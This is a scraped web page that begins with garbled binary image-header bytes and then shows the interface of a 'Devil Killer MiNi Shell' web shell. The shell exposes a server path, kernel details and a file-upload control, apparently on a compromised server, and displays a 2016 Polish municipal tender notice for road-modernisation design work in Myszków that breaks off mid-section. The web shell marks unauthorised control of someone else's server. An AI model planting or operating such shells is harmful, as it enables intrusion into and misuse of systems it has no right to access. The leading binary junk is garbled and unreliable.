JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160404/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160404/76408-N-2016.html

<p class="kh_header"><b>Myszków: WYKONANIE DOKUMENTACJI PROJEKTOWO - KOSZTORYSOWYCH 
I STWiOR DO REALIZACJI ZADANIA INWESTYCYJNEGO PN. POPRAWA BEZPIECZEŃSTWA RUCHU POPRZEZ MODERNIZACJĘ ODCINKÓW DRÓG GMINNYCH - III ETAP, WRAZ ZE SPRAWOWANIEM 
NADZORU AUTORSKIEGO</b><br>
<b>Numer ogłoszenia: 76408 - 2016; data zamieszczenia: 04.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Myszków , ul. Kościuszki 26, 42-300 Myszków, woj. śląskie, tel. (34) 313 26 82 w. 145, faks (34) 313 50 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.miastomyszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE DOKUMENTACJI PROJEKTOWO - KOSZTORYSOWYCH 
I STWiOR DO REALIZACJI ZADANIA INWESTYCYJNEGO PN. POPRAWA BEZPIECZEŃSTWA RUCHU POPRZEZ MODERNIZACJĘ ODCINKÓW DRÓG GMINNYCH - III ETAP, WRAZ ZE SPRAWOWANIEM 
NADZORU AUTORSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie dokumentacji projektowo - kosztorysowej 
i specyfikacji technicznej wykonania i odbioru robót budowlanych (STWiOR) do realizacji zadania inwestycyjnego pn. Poprawa bezpieczeństwa ruchu poprzez modernizację odcinków dróg gminnych - III etap, wraz ze sprawowaniem nadzoru autorskiego, 
na następujące części zamówienia:
1)	Część 1 zamówienia: Dokumentacja projektowo-kosztorysowa i STWiOR do wykonania przebudowy drogi w ul. Budowlanej wraz z jej odwodnieniem (jezdnia oraz chodnik w ul. Budowlanej wraz z ich odwodnieniem), wraz decyzją pozwolenia na budowę oraz sprawowaniem nadzoru autorskiego nad opracowaną dokumentacją;
2)	Część 2 zamówienia: Dokumentacja projektowo-kosztorysowa i STWiOR do wykonania przebudowy drogi wewnętrznej przy Zespole Szkół Publicznych nr 3 
w Myszkowie wraz z jej odwodnieniem i oświetleniem ulicznym (jezdnia, chodniki oraz parkingi wraz z ich odwodnieniem oraz oświetlenie uliczne/parkowe), wraz 
z decyzją pozwolenia na budowę oraz sprawowaniem nadzoru autorskiego nad opracowaną dokumentacją;
3)	Część 3 zamówienia: Dokumentacja projektowo-kosztorysowa i STWiOR do wykonania przebudowy drogi w ul. Siewierskiej wraz z jej odwodnieniem (jezdnia oraz chodniki wraz z ich odwodnieniem), wraz z decyzją pozwolenia na budowę oraz sprawowaniem nadzoru autorskiego nad opracowaną dokumentacją;
4)	Część 4 zamówienia: Dokumentacja projektowo-kosztorysowa i STWiOR do wykonania przebudowy drogi w ul. Słowiańskiej wraz z jej odwodnieniem (jezdnia oraz chodnik wraz z ich odwodnieniem), wraz z decyzją pozwolenia na budowę oraz sprawowaniem nadzoru autorskiego nad opracowaną dokumentacją;
5)	Część 5 zamówienia: Dokumentacja projektowo-kosztorysowa i STWiOR do wykonania przebudowy drogi w ul. Włodowskiej wraz z jej odwodnieniem oraz przebudową mostu w ciągu ww. ulicy (na odcinku od ul. Nierada do ul. Nadrzecznej 
- jednia, chodnik, wraz z ich odwodnieniem oraz przebudowa mostu na rzece Warta), wraz z decyzją pozwolenia na budowę oraz sprawowaniem nadzoru autorskiego nad opracowaną dokumentacją. 
2.	Rodzaj zamówienia: usługa.
3.	Kody CPV dotyczące zamówienia:
1)	Główny przedmiot: 71320000-7: Usługi inżynieryjne w zakresie projektowania;
2)	Dodatkowe przedmioty: 71248000-8: Nadzór nad projektem i dokumentacją.
4.	Na przedmiot zamówienia składają się prace projektowo - kosztorysowe i STWiOR, opisane odpowiednio dla poszczególnych części zamówienia w Szczegółowym opisie przedmiotu zamówienia, stanowiącym załącznik nr 1 do SIWZ, obejmujące:
1)	przebudowę drogi w ul. Budowlanej wraz z jej odwodnieniem, zgodnie z wykonanym przez Wykonawcę i zatwierdzonym przez Zamawiającego projektem koncepcyjnym zagospodarowania pasa drogowego, uwzględniającym wymagania Zamawiającego zawarte  w załączniku nr 1 do SIWZ - długość drogi: ok. 170 m, droga publiczna gminna, klasa drogi: lokalna;
2)	przebudowę drogi wewnętrznej przy Zespole Szkół Publicznych nr 3 w Myszkowie wraz z jej odwodnieniem i oświetleniem ulicznym, zgodnie z wykonanym przez Wykonawcę i zatwierdzonym przez Zamawiającego projektem koncepcyjnym zagospodarowania pasa drogowego, uwzględniającym wymagania Zamawiającego zawarte  w załączniku nr 1 do SIWZ - długość drogi: ok. 310 m; 
3)	przebudowę drogi w ul. Siewierskiej wraz z jej odwodnieniem, zgodnie z wykonanym przez Wykonawcę i zatwierdzonym przez Zamawiającego projektem koncepcyjnym zagospodarowania pasa drogowego, uwzględniającym wymagania Zamawiającego zawarte  w załączniku nr 1 do SIWZ - długość drogi: ok. 1660 m, droga publiczna gminna, 
klasa drogi: lokalna;
4)	przebudowę drogi w ul. Słowiańskiej wraz z jej odwodnieniem, zgodnie z wykonanym przez Wykonawcę i zatwierdzonym przez Zamawiającego projektem koncepcyjnym zagospodarowania pasa drogowego, uwzględniającym wymagania Zamawiającego zawarte  w załączniku nr 1 do SIWZ - długość drogi: ok. 150 m, droga publiczna gminna, 
klasa drogi: lokalna;
5)	przebudowę drogi w ul. Włodowskiej wraz z jej odwodnieniem oraz przebudową mostu w ciągu ww. ulicy, zgodnie z wykonanym przez Wykonawcę i zatwierdzonym przez Zamawiającego projektem koncepcyjnym zagospodarowania pasa drogowego, uwzględniającym wymagania Zamawiającego zawarte  w załączniku nr 1 do SIWZ 
- długość drogi: ok. 350 m, droga publiczna gminna, klasa drogi: lokalna,
oraz sprawowanie nadzoru autorskiego w trakcie przebudowy ww. dróg.
5.	Wykonana kompletna dokumentacja projektowo - kosztorysowa wraz ze specyfikacją techniczną wykonania i odbioru robót winna umożliwić Zamawiającemu:
a)	uzyskanie wymaganych prawem decyzji i pozwoleń, w tym decyzji pozwolenie na budowę (również dla zakresu nie wymagającego uzyskania pozwolenia na budowę - zgodnie 
z art. 30 ust. 1a Prawa budowlanego), 
b)	udzielenie zamówienia publicznego w trybie przetargu nieograniczonego na wykonanie robót budowlanych zgodnie z przepisami ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych, w tym: określenie przedmiotu zamówienia w postępowaniu o udzielenie zamówienia publicznego na roboty budowlane w sposób zgodny z przepisami art. 29 ust. 3, art. 30 i 31 ww. ustawy, w celu zachowania uczciwej konkurencji i równego traktowania wykonawców robót budowlanych,
c)	wykonanie robót budowlanych o zakresie określonym w ust. 4.
6.	W ramach sprawowania nadzoru autorskiego Wykonawca jest obowiązany do:
a)	czuwania w toku realizacji nad zgodnością rozwiązań technicznych, materiałowych i użytkowych z dokumentacją projektową,
b)	wyjaśniania wątpliwości powstałych w toku realizacji,
c)	uzgadniania z Zamawiającym możliwości wprowadzenia rozwiązań zamiennych w stosunku do materiałów i konstrukcji przewidzianych w dokumentacji projektowej i dokonywaniu tych zmian,
d)	uzgadniania z Zamawiającym możliwości wprowadzenia rozwiązań zamiennych w stosunku do materiałów i konstrukcji przewidzianych w dokumentacji projektowej i dokonywaniu tych zmian,
e)	udziału w komisjach i naradach technicznych oraz uczestnictwie w odbiorze inwestycji.
7.	Obowiązki Wykonawcy w zakresie projektowania oraz sprawowania nadzoru autorskiego zostały szczegółowo określone we wzorze umowy w sprawie zamówienia publicznego odpowiednim dla danej części zamówienia:
a)	dla części 1 zamówienia - załącznik nr 8 do SIWZ,
b)	dla części 2 zamówienia - załącznik nr 9 do SIWZ,
c)	dla części 3 zamówienia - załącznik nr 10 do SIWZ,
d)	dla części 4 zamówienia - załącznik nr 11 do SIWZ,
e)	dla części 5 zamówienia - załącznik nr 12 do SIWZ
8.	Zamawiający przewiduje składanie ofert częściowych przez Wykonawców.
Wykonawca może złożyć oferty częściowe na jedną lub więcej części zamówienia, przy czym na daną część zamówienia Wykonawca może złożyć tylko jedną ofertę.
9.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia.
10.	Wykonawca jest zobowiązany do wskazania w składanej ofercie części zamówienia, które zamierza powierzyć podwykonawcy.
11.	Zamawiający nie dopuszcza:
a)	składania ofert wariantowych.
12.	Zamawiający nie przewiduje:
1)	zawarcia umowy ramowej;
2)	ustanowienia dynamicznego systemu zakupów;
3)	wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej;
4)	rozliczenia w walucie innej niż polski nowy złoty (PLN).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2019.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli: a)	z treści oświadczenia o spełnieniu warunków udziału w postępowaniu, określonych 
w art. 22 ust. 1 ustawy, będzie wynikać, że Wykonawca spełnia przedmiotowy warunek; 
oraz:
b)	z wykazu wykonanych głównych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie, będzie wynikać, że:
b1)	w części 1 zamówienia:
­	Wykonawca w ramach maksymalnie jednej usługi wykonał dokumentację projektową na budowę lub przebudowę drogi/dróg (w rozumieniu Prawa budowlanego), o łącznej wartości brutto min. 3 000,00 zł, oraz
­	w celu potwierdzenia należytego wykonania wykazanej usługi Wykonawca załączył poświadczenie, że wykazana usługa została wykonana należycie.
b2)	w części 2 zamówienia:
­	Wykonawca w ramach maksymalnie jednej usługi wykonał dokumentację projektową na budowę lub przebudowę drogi/dróg (w rozumieniu Prawa budowlanego), o łącznej wartości brutto min. 25 000,00 zł, oraz
­	w celu potwierdzenia należytego wykonania wykazanej usługi Wykonawca załączył poświadczenie, że wykazana usługa została wykonana należycie.
b3)	w części 3 zamówienia: 
­	Wykonawca w ramach maksymalnie jednej usługi wykonał dokumentację projektową na budowę lub przebudowę drogi/dróg (w rozumieniu Prawa budowlanego), o łącznej wartości brutto min. 40 000,00 zł, oraz
­	w celu potwierdzenia należytego wykonania wykazanej usługi Wykonawca załączył poświadczenie, że wykazana usługa została wykonana należycie.
b4)	w części 4 zamówienia:
­	Wykonawca w ramach maksymalnie jednej usługi wykonał dokumentację projektową na budowę lub przebudowę drogi/dróg (w rozumieniu Prawa budowlanego), o łącznej wartości brutto min. 2 000,00 zł, oraz
­	w celu potwierdzenia należytego wykonania wykazanej usługi Wykonawca załączył poświadczenie, że wykazana usługa została wykonana należycie.
b5)	w części 5 zamówienia:
­	Wykonawca w ramach maksymalnie jednej usługi wykonał dokumentację projektową na budowę lub przebudowę drogi/dróg (w rozumieniu Prawa budowlanego), o łącznej wartości brutto min. 10 000,00 zł, oraz 
­	Wykonawca w ramach maksymalnie jednej usługi wykonał dokumentację projektową na budowę lub przebudowę mostu (w rozumieniu Prawa budowlanego), o wartości brutto min. 40 000,00 zł, oraz 
­	w celu potwierdzenia należytego wykonania wykazanej usługi Wykonawca załączył poświadczenie, że wykazana usługa została wykonana należycie.
W przypadku złożenia przez Wykonawcę ofert na dwie lub więcej części zamówienia, w celu dokonania oceny spełnienia warunku wiedzy i doświadczenia Zamawiający przeprowadzi sumowanie wartości brutto wykazanych usług polegających na wykonaniu dokumentacji projektowej na budowę lub przebudowę dróg - odpowiednio do składanych ofert na poszczególne części zamówienia, przy czym, jeżeli Wykonawca złożył ofertę również na część 5 zamówienia, to winien wykazać jeszcze wykonanie w ramach maksymalnie jednej usługi dokumentacji projektowej na budowę lub przebudowę mostu o wartości brutto min. 40 000,00 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli:
z treści oświadczenia o spełnianiu warunków udziału w postępowaniu, określonych 
w art. 22 ust. 1 ustawy, będzie wynikało, że Wykonawca spełnia przedmiotowy warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli: a)	z treści oświadczenia o spełnieniu warunków udziału w postępowaniu, określonych 
w art. 22 ust. 1 ustawy, będzie wynikać, że Wykonawca spełnia przedmiotowy arunek,
oraz:
b)	w wykazie osób, które będą uczestniczyć w wykonaniu zamówienia, 
w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami 
na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, 
a także zakresu wykonywanych przez nie czynności, oraz informacji o podstawie dysponowania tymi osobami, Wykonawca wykaże dysponowanie co najmniej:
­	1 projektantem posiadającym uprawnienia budowlane bez ograniczeń 
do projektowania w specjalności drogowej - w częściach zamówienia: 1, 2, 
3, 4, 5,
­	1 projektantem posiadającym uprawnienia budowlane bez ograniczeń 
do projektowania w specjalności mostowej - w części 5 zamówienia,
­	1 projektantem posiadającym uprawnienia budowlane bez ograniczeń do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji 
i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyj-nych - w częściach zamówienia: 1, 2, 3, 4, 5,
­	1 projektantem posiadającym uprawnienia budowlane bez ograniczeń do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji 
i urządzeń: elektrycznych i elektroenergetycznych - w części 2 zamówienia. 
W przypadku złożenia przez Wykonawcę ofert na dwie lub więcej części zamówienia, w celu dokonania oceny spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający wymaga, aby wykazane osoby przez Wykonawcę posiadały uprawnienia budowlane do projektowania w specjalnościach i zakresie wymaganym jak wyżej, co oznacza, że o ilości projektantów będą decydowały ich uprawnienia zawodowe w odniesieniu do części zamówienia, na realizacje których będą złożone oferty. 
Za równoważne uprawnieniom budowlanym bez ograniczeń uważa się odpowiadające im merytoryką i zakresem ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów niż ustawa z dnia 7 lipca 1944 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r. poz. 1409 z późn. zm.) oraz Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 
11 września 2014r. w  sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r., poz. 1278 z późn. zm.).
Zamawiający dopuszcza łączenie poszczególnych uprawnień budowlanych przez tę samą osobę, pod warunkiem posiadania przez nią wymaganych uprawnień budowlanych. Przy łączeniu uprawnień ilość wykazywanych osób jest uwarunkowana kompletem wymaganych uprawnień budowlanych, które zostały określone powyżej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli:
z treści oświadczenia o spełnianiu warunków udziału w postępowaniu, określonych 
w art. 22 ust. 1 ustawy, będzie wynikało, że Wykonawca spełnia przedmiotowy warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Z wykazu wykonanych głównych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie, będzie wynikać, że:
1)	w części 1 zamówienia:
­	Wykonawca w ramach maksymalnie jednej usługi wykonał dokumentację projektową na budowę lub przebudowę drogi/dróg (w rozumieniu Prawa budowlanego), o łącznej wartości brutto min. 3 000,00 zł, oraz
­	w celu potwierdzenia należytego wykonania wykazanej usługi Wykonawca załączył poświadczenie, że wykazana usługa została wykonana należycie.
2)	w części 2 zamówienia:
­	Wykonawca w ramach maksymalnie jednej usługi wykonał dokumentację projektową na budowę lub przebudowę drogi/dróg (w rozumieniu Prawa budowlanego), o łącznej wartości brutto min. 25 000,00 zł, oraz
­	w celu potwierdzenia należytego wykonania wykazanej usługi Wykonawca załączył poświadczenie, że wykazana usługa została wykonana należycie.
3)	w części 3 zamówienia: 
­	Wykonawca w ramach maksymalnie jednej usługi wykonał dokumentację projektową na budowę lub przebudowę drogi/dróg (w rozumieniu Prawa budowlanego), o łącznej wartości brutto min. 40 000,00 zł, oraz
­	w celu potwierdzenia należytego wykonania wykazanej usługi Wykonawca załączył poświadczenie, że wykazana usługa została wykonana należycie.
4)	w części 4 zamówienia:
­	Wykonawca w ramach maksymalnie jednej usługi wykonał dokumentację projektową na budowę lub przebudowę drogi/dróg (w rozumieniu Prawa budowlanego), o łącznej wartości brutto min. 2 000,00 zł, oraz
­	w celu potwierdzenia należytego wykonania wykazanej usługi Wykonawca załączył poświadczenie, że wykazana usługa została wykonana należycie.
5)	w części 5 zamówienia:
­	Wykonawca w ramach maksymalnie jednej usługi wykonał dokumentację projektową na budowę lub przebudowę drogi/dróg (w rozumieniu Prawa budowlanego), o łącznej wartości brutto min. 10 000,00 zł, oraz 
­	Wykonawca w ramach maksymalnie jednej usługi wykonał dokumentację projektową na budowę lub przebudowę mostu (w rozumieniu Prawa budowlanego), o wartości brutto min. 40 000,00 zł, oraz 
­	w celu potwierdzenia należytego wykonania wykazanej usługi Wykonawca załączył poświadczenie, że wykazana usługa została wykonana należycie.
W przypadku złożenia przez Wykonawcę ofert na dwie lub więcej części zamówienia, w celu dokonania oceny spełnienia warunku wiedzy i doświadczenia Zamawiający przeprowadzi sumowanie wartości brutto wykazanych usług polegających na wykonaniu dokumentacji projektowej na budowę lub przebudowę dróg - odpowiednio do składanych ofert na poszczególne części zamówienia, przy czym, jeżeli Wykonawca złożył ofertę również na część 5 zamówienia, to winien wykazać jeszcze wykonanie w ramach maksymalnie jednej usługi dokumentacji projektowej na budowę lub przebudowę mostu o wartości brutto min. 40 000,00 zł.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
